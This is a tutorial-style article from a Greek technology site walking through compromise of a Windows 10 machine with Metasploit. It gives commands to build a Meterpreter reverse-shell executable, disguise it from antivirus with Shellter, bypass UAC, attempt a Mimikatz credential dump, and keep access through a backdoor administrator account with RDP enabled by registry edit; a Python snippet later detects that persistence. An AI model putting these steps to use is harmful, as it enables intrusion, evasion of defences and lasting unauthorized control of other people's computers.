Attack on Windows 10 with Metasploit on Kali Linux

In this article we will see how to gain access to a Windows 10 machine from Kali Linux, and more specifically with Metasploit. We have talked about how Metasploit works in the past. We have already installed Windows 10 on a machine, and we will try to gain access to it with an infected .exe file.

Create an infected .exe file

To create the executable .exe file, open your terminal and type the following command:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe LHOST=192.168.100.4 LPORT=4444 -o /root/something32.exe

This creates a payload for the Windows 10 machine, for the 32-bit architecture.

To find our IP address (the LHOST value), we use the ifconfig command inside Kali, specifying the interface eth0 (since we are on Ethernet):


The following screenshot shows the results of the command for the successful creation of the .exe file:


The next step is to make the .exe file we created undetectable by security programs.

Making the FUD executable file

To make our file undetectable, we will use Shellter. Shellter changes the signature of the executable, turning the malicious file into a completely new and unique file that can bypass detection by antivirus.

In Kali Linux, install Shellter with the following command:

sudo apt-get install shellter

To run Shellter, just type shellter in your terminal.

You will be prompted to enter the path to the executable file to make it FUD. Make sure you select the "Auto" mode as shown below.


Shellter will then perform some checks and ask you whether you want to perform the operation. Select "Y" for yes.


The next message that appears asks you to enter the payload; here we use what we made at the beginning with Msfvenom. Type "L" to choose from the list of built-in payloads (rather than supplying your own custom payload), then select the payload to use. We need Meterpreter_Reverse_TCP, so we follow option "1".


Type LHOST and LPORT and press Enter. Shellter will complete the process and ask you to press Enter.


At this point, our file has become undetectable by all antivirus and other security programs.

You could buy your own crypter that is constantly being upgraded and remains undetectable in the long run. Shellter will keep your file hidden for a while but at some point it will be added to the program lists and detected by antivirus.

Now we need to create a listener on the port we specified inside the executable file. We do this with Metasploit, using the msfconsole command on the Kali Linux terminal.

The following screenshot shows which commands to use in Metasploit. First, we tell Metasploit to use the generic payload handler with the command use multi/handler. Next, we configure the payload to match what is inside the executable file, with set payload windows/meterpreter/reverse_tcp. Then we set LHOST and LPORT to the values we used when creating the executable, with set LHOST 192.168.100.4 and set LPORT 4444. When done, type "run" or "exploit" and press Enter.

If everything goes well, you will see the following screenshot: the reverse handler has started and is waiting for a connection.


The next step is to run the Windows executable file. How you deliver it to your victim in a real attack is your problem and something we will not analyze now, because we have already done it in the past…

Execution of Payload

So we transfer our file to Windows and run it.


Running the file executes the payload, which opens a connection back to our attack machine (Kali Linux). Immediately, we get a Meterpreter session on Kali Linux. This is confirmed by the meterpreter > prompt, as shown below:


Since the file was not executed as an "administrator", there are Meterpreter commands that cannot be executed, as they lead to an "access denied" response. This can be confirmed by running the getuid command, which tells us that we are running as the user l3s7r0z.


To prove that the user does not have enough privileges, we tried to run the command mimikatz_command -f sekurlsa::logonPasswords.

The result is an "Access is denied" message, as shown below:


To gain sufficient rights, we must bypass UAC. In the next step, we will see how this can be done.

Privilege escalation

Privilege escalation allows us to raise our privileges (or rights, if you prefer) from a less privileged user (l3s7r0z) to a more privileged one, preferably the SYSTEM user, who has all the administrator rights.

Metasploit by default provides us with some methods that allow us to increase our privileges. In the Meterpreter command line, we use the getsystem command, as shown below:


Since all the methods tried by getsystem fail, we need an alternative way to increase our privileges.

We will use the comhijack exploit module to bypass User Account Control (UAC).

To do this, we put our Meterpreter session in the background, change our module from multi/handler to windows/local/bypassuac_comhijack and point it at the session we have in the background, using set SESSION 2.


Next, we set our payload to windows/x64/meterpreter/reverse_tcp, together with LPORT and LHOST. Then we run the exploit.


We successfully received a Meterpreter session. We can type "sysinfo" to see information about our target. getuid shows us that we are still running as the user l3s7r0z on Windows 10, but now we can elevate to SYSTEM by running "getsystem".

We can see that our elevation was successful, and we can confirm it by running the "getuid" command again: we are now NT AUTHORITY\SYSTEM.


At this point we have full access to Windows and can obtain whatever data we want, such as the files that interest us, and so on.

P

We will now see how we maintain the access we have to our victim even when the target decides to correct the vulnerability.

We will achieve this by enabling RDP. In simple words, we will have our own account on the target and enable RDP, so that whenever we want we can connect to the machine and access the information we want.

In the Meterpreter session, we use the shell command to open a Windows command shell on our target (Windows 10).


At the C:\Windows\system32> prompt, we give the command net users. This lists all Windows users. As we can see, there are only two users, Administrator and the user l3s7r0z.

We add a new user, jaime, and give it the password Bru73f0rc3_.

The command used to do this is:

net user jaime Bru73f0rc3_ /add

We then add jaime to the Administrators group so that the account can perform administrator functions. The command we use is:

net localgroup administrators jaime /add

Then we add it to the Remote Desktop Users group. This will allow us to connect to the machine via RDP, even after the vulnerability we used has been fixed by antivirus programs.

The command we use is:

net localgroup "Remote Desktop Users" jaime /add

Once the configuration for jaime is complete, we can use the following command to see the properties of the user:

net user jaime

The following snapshot shows the results of the command.


In some cases, RDP is not enabled on the victim machine. While we are in the shell, we can enable it by setting a registry value.

To enable RDP, use the following command:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

If you later want to disable RDP again, you can do so with the following command:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f

The result of the operation is shown below:

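From the defender's side, the persistence steps above (a new local account, membership in Administrators and Remote Desktop Users, and fDenyTSConnections set to 0) all leave traces in the Windows Security log. The following Python is an added detection example, not code from the original article: it correlates constructed, simplified event records (real events carry fields such as TargetUserName, MemberName, TargetSid and ObjectValueName, and 4657 requires registry auditing to be enabled on the key) and flags accounts that match the whole pattern.

```python
"""Added detection example: correlate Windows Security events that together
match the RDP-persistence steps described in the article (constructed data)."""
from collections import defaultdict

ADMINS_SID = "S-1-5-32-544"      # BUILTIN\Administrators
RDP_USERS_SID = "S-1-5-32-555"   # BUILTIN\Remote Desktop Users
RDP_KEY = r"\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"

# Constructed sample events, simplified from the real Security event IDs:
#   4720 = a user account was created
#   4732 = a member was added to a security-enabled local group
#   4657 = a registry value was modified (needs "Audit Registry" + a SACL)
SAMPLE_EVENTS = [
    {"id": 4720, "target": "jaime", "subject": "l3s7r0z"},
    {"id": 4732, "member": "jaime", "group_sid": ADMINS_SID},
    {"id": 4732, "member": "jaime", "group_sid": RDP_USERS_SID},
    {"id": 4657, "key": RDP_KEY, "value": "fDenyTSConnections", "new": 0},
    # benign noise: a service account added to Performance Log Users
    {"id": 4732, "member": "svc_backup", "group_sid": "S-1-5-32-559"},
]


def find_rdp_persistence(events):
    """Return the newly created accounts that were also granted BOTH
    Administrators and Remote Desktop Users membership, plus whether RDP
    was switched on through the registry in the same batch of events."""
    created = set()
    groups = defaultdict(set)   # member name -> set of group SIDs added to
    rdp_enabled = False
    for ev in events:
        if ev["id"] == 4720:
            created.add(ev["target"].lower())
        elif ev["id"] == 4732:
            groups[ev["member"].lower()].add(ev["group_sid"])
        elif (ev["id"] == 4657 and ev["key"].endswith("Terminal Server")
              and ev["value"] == "fDenyTSConnections" and ev["new"] == 0):
            rdp_enabled = True
    suspicious = sorted(u for u in created
                        if {ADMINS_SID, RDP_USERS_SID} <= groups[u])
    return {"accounts": suspicious, "rdp_enabled_by_registry": rdp_enabled}


if __name__ == "__main__":
    print(find_rdp_persistence(SAMPLE_EVENTS))
```

On a real host the same three event IDs can be pulled with Get-WinEvent on the Security log, or the current state can be checked directly with Get-LocalGroupMember and the fDenyTSConnections value.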

From Kali Linux, we can use the Remmina remote desktop client. If it is not installed in Kali, you can install it with the following command:

apt-get install remmina

Start Remmina by typing remmina at the command prompt and log in to the target using its IP address.


You will be asked to accept a certificate. Do this, and then use the username and password you set when creating the jaime account, that is:

Username: jaime

Password: Bru73f0rc3_

By default in Windows 10, the user currently logged in to the machine will be asked to allow your sign-in. However, if they do not respond within 30 seconds, they are automatically disconnected.


iGuRu.gr, The Best Technology Site in Greece


Written by Anastasis Vasileiadis
